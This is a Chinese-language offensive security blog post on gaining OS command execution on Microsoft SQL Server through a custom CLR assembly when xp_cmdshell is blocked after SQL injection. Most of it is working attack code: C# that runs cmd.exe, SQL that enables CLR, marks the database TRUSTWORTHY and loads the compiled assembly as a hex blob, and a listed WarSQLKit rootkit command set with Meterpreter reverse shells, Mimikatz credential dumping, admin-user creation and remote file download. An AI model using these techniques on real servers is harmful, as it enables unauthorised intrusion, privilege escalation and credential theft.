警告
本文最后更新于 2019-10-23 ,文中内容可能已过时。
使用mssql中的clr程序集来执行命令
在我们拿到一个mssql的可堆叠注入时,可能第一时间想到的就是使用 xp_cmdshell
和 sp_OACreate
来执行命令、反弹shell等等,然而很多时候这两个存储过程不是被删就是被拦截,各种各样的因素导致我们不能执行系统命令,本文就来解决这个问题。
CLR微软官方把他称为公共语言运行时 ,从 SQL Server 2005 开始,SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。 这意味着现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。
那么我们来使用C#来创建一个clr项目,在项目中我们创建一个存储过程调用cmd来执行命令。
我在这里使用windows 2008、MSSQL2008r2和visual studio 2019来做演示。需要注意的是在MSSQL2008及以前的版本中是基于.net3.5运行的,不支持.net4.0+的CLR项目,需要将项目属性设置为.net3.5的,在这里踩了很大的坑。
创建MSSQL数据库项目
修改项目属性,勾上创建SQL文件
选.net3.5 来兼容旧版本MSSQL,权限级别要改为UNSAFE,因为我们要调用外部程序,必须设置为UNSAFE才可以。
保存后右键项目名字 新建项-创建存储过程
选择clr
然后修改代码,我贴上我的代码,注意类名和命名空间的修改
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
using System ;
using System.Data ;
using System.Data.SqlClient ;
using System.Data.SqlTypes ;
using System.Diagnostics ;
using System.Text ;
using Microsoft.SqlServer.Server ;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecCommand ( string cmd )
{
// 在此处放置代码
SqlContext . Pipe . Send ( "Command is running, please wait." );
SqlContext . Pipe . Send ( RunCommand ( "cmd.exe" , " /c " + cmd ));
}
public static string RunCommand ( string filename , string arguments )
{
var process = new Process ();
process . StartInfo . FileName = filename ;
if (! string . IsNullOrEmpty ( arguments ))
{
process . StartInfo . Arguments = arguments ;
}
process . StartInfo . CreateNoWindow = true ;
process . StartInfo . WindowStyle = ProcessWindowStyle . Hidden ;
process . StartInfo . UseShellExecute = false ;
process . StartInfo . RedirectStandardError = true ;
process . StartInfo . RedirectStandardOutput = true ;
var stdOutput = new StringBuilder ();
process . OutputDataReceived += ( sender , args ) => stdOutput . AppendLine ( args . Data );
string stdError = null ;
try
{
process . Start ();
process . BeginOutputReadLine ();
stdError = process . StandardError . ReadToEnd ();
process . WaitForExit ();
}
catch ( Exception e )
{
SqlContext . Pipe . Send ( e . Message );
}
if ( process . ExitCode == 0 )
{
SqlContext . Pipe . Send ( stdOutput . ToString ());
}
else
{
var message = new StringBuilder ();
if (! string . IsNullOrEmpty ( stdError ))
{
message . AppendLine ( stdError );
}
if ( stdOutput . Length != 0 )
{
message . AppendLine ( "Std output:" );
message . AppendLine ( stdOutput . ToString ());
}
SqlContext . Pipe . Send ( filename + arguments + " finished with exit code = " + process . ExitCode + ": " + message );
}
return stdOutput . ToString ();
}
}
编译后,会生成导入程序集并且创建执行命令存储过程的sql语句
在导入程序集之前我们需要做些准备,首先我们这个CLR功能MSSQL中是默认没有开启的,我们需要手动开启下
1
2
3
4
sp_configure 'clr enabled' , 1
GO
RECONFIGURE
GO
当导入了不安全的程序集之后我们还需要执行以下语句将数据库标记为安全。
1
ALTER DATABASE master SET TRUSTWORTHY ON ;
然后就可以导入我们的程序集了,在项目编译完之后生成的sql文件中有字节流形式的语句来导入
1
2
3
4
5
CREATE ASSEMBLY [ evilclr ]
AUTHORIZATION [ dbo ]
FROM 0 x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030068BBB65D0000000000000000E00022200B013000000E000000060000000000004E2C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000FC2B00004F00000000400000A002000000000000000000000000000000000000006000000C000000C42A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000540C000000200000000E000000020000000000000000000000000000200000602E72737263000000A0020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000302C00000000000048000000020005007C220000480800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076322E302E35303732370000000005006C000000A8020000237E000014030000B003000023537472696E677300000000C4060000B4000000235553007807000010000000234755494400000088070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000CC0101000000000006006601B60206008601B60206003C01A3020F00D602000006003803D8010A0050014E020E001103A3020600DF01D80106002002760306002101B6020E00F602A3020A0082034E020A0019014E020600BA01D8010E00F701A3020E00C800A3020E003502A30206000802360006001502360006002700D801000000002D00000000000100010001001000E5020000150001000100030110000100000015000100040006006C037900502000000000960083007D00010084200000000096008F001A0002005C220000000086189D02060004005C220000000086189D0206000400652200000000830016008200040000000100750000000100E800000002002703000001002E02000002000C0309009D02010011009D02060019009D020A0031009D02060051009D02060061001001100069009A001500710031031A0039009D0206003900E90132007900DB0015007100A003370079001903150079008D033C007900B80041007900A4013C00790083023C00790051033C0049009D02060089009D02470039005E004D0039004B0353003900F1000600390071025700990079005C0039003F0306004100AC005C0039009F0060002900B8015C004900050164004900C1016000A100B8015C00710031036A0029009D02060059004C005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA00200004800000000000000000000000000000000069020000020000000000000000000000700055000000000002000000000000000000000070004000000000000200000000000000000000007000D80100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F3000496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468006576696C636C722E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006576696C636C72006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A00200000001E897910CE56A742B9629E72009C5099000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000701000000000401000000000000000068BBB65D00000000020000001C010000E02A0000E00C0000525344534FDE46A4C9F4284FAAE5619111BF655C01000000453A5C636F64655C6373686172705C6576696C636C725C6576696C636C725C6F626A5C44656275675C6576696C636C722E70646200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000242C000000000000000000003E2C0000002000000000000000000000000000000000000000000000302C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000038000C00010049006E007400650072006E0061006C004E0061006D00650000006500760069006C0063006C0072002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000040000C0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000006500760069006C0063006C0072002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000503C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
WITH PERMISSION_SET = UNSAFE ;
go
执行完之后我们的程序集就被导入了MSSQL中,此处是使用字节流的形式来执行的,你也可以直接导入dll文件来导入程序集。
右键程序集-新建程序集-选择你的dll路径-选择无限制 ,在这里的无限制对应的是我们创建项目时选择的UNSAFE。
然后创建存储过程
1
2
3
4
CREATE PROCEDURE [ dbo ].[ ExecCommand ]
@ cmd NVARCHAR ( MAX )
AS EXTERNAL NAME [ evilclr ].[ StoredProcedures ].[ ExecCommand ]
go
然后执行命令
1
exec dbo . execcommand 'whoami'
然后就可以尽情发挥咯!
上文写的是简单的执行命令,那我们能不能进行拓展呢?比如直接反弹msf、下载文件、执行mimikatz?
我在GitHub上发现了这个 MSSQL-Fileless-Rootkit-WarSQLKit ,我先列出来他的可用命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
EXEC sp_cmdExec 'whoami' ; => Any Windows command
EXEC sp_cmdExec 'whoami /RunSystemPriv' ; => Any Windows command with NT AUTHORITY \ SYSTEM rights
EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv' ; => Adding users with RottenPotato ( Kumpir )
EXEC sp_cmdExec '"net localgroup administrators eyup /add" /RunSystemPriv' ; => Adding user to localgroup with RottenPotato ( Kumpir )
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS' ; => ( Powershell ) with RottenPotato ( Kumpir )
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem' ; => x86 Meterpreter Reverse Connection with NT AUTHORITY \ SYSTEM
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem' ; => x64 Meterpreter Reverse Connection with NT AUTHORITY \ SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem' ; => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY \ SYSTEM , RC4PASSWORD = warsql
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem' ; => x86 Meterpreter Bind Connection with NT AUTHORITY \ SYSTEM
EXEC sp_cmdExec 'sp_Mimikatz' ;
select * from WarSQLKitTemp => Get Mimikatz Log . Thnks Benjamin Delpy :)
EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\ProgramData\file.exe 300' ; => Download File
EXEC sp_cmdExec 'sp_getSqlHash' ; => Get MSSQL Hash
EXEC sp_cmdExec 'sp_getProduct' ; => Get Windows Product
EXEC sp_cmdExec 'sp_getDatabases' ; => Get Available Database
很牛逼对吧?但是他只支持.net4.0+哦!也就是MSSQL2012以上的版本,这也是我踩过的坑,呜呜呜😭
https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit https://www.4hou.com/technology/3338.html https://blog.netspi.com/attacking-sql-server-clr-assemblies/ https://github.com/NetSPI/PowerUpSQL/wiki 文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。